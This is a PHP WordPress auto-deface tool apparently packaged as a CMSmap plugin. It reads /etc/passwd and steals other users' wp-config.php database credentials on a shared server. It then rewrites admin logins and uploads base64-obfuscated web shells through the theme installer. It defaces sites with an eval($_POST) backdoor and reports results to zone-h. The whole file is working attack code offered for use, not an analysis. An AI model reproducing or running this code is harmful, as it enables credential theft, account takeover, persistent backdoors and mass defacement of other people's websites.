<?php
/**
* Plugin Name: CMSmap - WordPress
* Plugin URI: https://github.com/m7x/cmsmap/
* Description: Simple WordPress - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
* Version: 1.0
* Author: CMSmap
* Author URI: https://github.com/m7x/cmsmap/
* License: GPLv2
*/
?>
<?php
error_reporting(0);
$zh = "Nabilaholic404"; // zone-h nick
$jembut = "jack"; // add username wordpress
$jembut2 = "linuxsec"; // add password wordpress
$kontol = "Hacked by LinuxSec <?php @eval($_POST[lincx]);?>"; // script deface
######################################################################
// script di bawah tidak perlu di otak atik
// jangan pernah mengubah nama file ( k.php ) dan ( m.php ) , atau auto deface tidak akan berjalan
echo "<body bgcolor=black>";
echo "<font color=green>";
echo "<title>IndoXploit WordPress Auto Deface</title>";
cover("IndoXploit");
function save($data){
$fp = @fopen("indo111212111.htm", "a") or die("cant open file");
fwrite($fp, $data);
fclose($fp);
}
function anucurl($sites){
$ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
}
function lohgin($cek, $web, $userr, $pass){
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "Log In",
"redirect_to" => "$web/wp-admin/",
"testcookie" => "1",
);
$ch = curl_init ("$cek");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
return $data6;
}
function cover($indoXploit){
echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
$a = file_get_contents('/etc/passwd');
preg_match_all('/(.*?):x:/', $a, $data);
foreach($data[1] as $user){
$baca = file_get_contents("/home/$user/public_html/wp-config.php");
/* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt'); */
if($baca!=""){
/* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
$file1 = "$user-config.txt";
$fp2 = fopen($file1,"w");
fputs($fp2,$baca);
$file = @file_get_contents($file1);
echo $user."-> sukses<br>";
$host = ambilkata($file,"DB_HOST', '","'");
$username = ambilkata($file,"DB_USER', '","'");
$password = ambilkata($file,"DB_PASSWORD', '","'");
$db = ambilkata($file,"DB_NAME', '","'");
$dbprefix = ambilkata($file,"table_prefix = '","'");
$user_baru = $jembut;
$password_baru = $jembut2;
$prefix = $db.".".$dbprefix."users";
$sue = $db.".".$dbprefix."options";
$pass = md5("$password_baru");
$nick = $kontol;
echo "# Db Host: $host<br>";
echo "# Db user: $username<br>";
echo "# Db Password: $password<br>";
echo "# Db name: $db<br>";
echo "# Table_Prefix: $dbprefix<br>";
mysql_connect($host,$username,$password);
mysql_select_db($db);
$tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$r=mysql_fetch_array($tampil);
$id = $r[ID];
$tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
$r2=mysql_fetch_array($tampil2);
$target = $r2[option_value];
echo "# $target<br>";
mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
$site= "$target/wp-login.php";
$site2= "$target/wp-admin/theme-install.php?upload";
$a = lohgin($site, $target, $user_baru, $password_baru);
$b = lohgin($site2, $target, $user_baru, $password_baru);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
echo "# token -> $anu2<br>";
$upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$c = file_get_contents($w);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@m.php",
"install-theme-submit" => "Install Now",
);
$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
$namafile = "wew.php";
$fp2 = fopen($namafile,"w");
fputs($fp2,base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
$y = date("Y");
$m = date("m");
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS,
array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = file_get_contents($as);
if(preg_match("/Local/",$bs)){
echo "[+] <font color='cyan'>Deface success..<br>";
echo "[+http] $as<br>";
save($as."<br>");
echo "[+] zone-h: ";
$ch3 = curl_init ("http://www.zddddddone-h.com/notify/single");
#curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
#curl_setopt ($ch3, CURLOPT_POST, 1);
#curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
echo " Ok <br><br>";
}else{
echo " No <br><br></font>";}
}
else{
echo "[!] <font color='red'>Deface Failed..<br>";
echo "[!] Try manual deface at : <br>";
echo "[+http] $target/wp-login.php<br>";
echo "[!] username: $user_baru<br>";
echo "[!] password: $password_baru<br><br><br></font>";
}
}
else{
echo "$user <= No<br>";
}
}
?>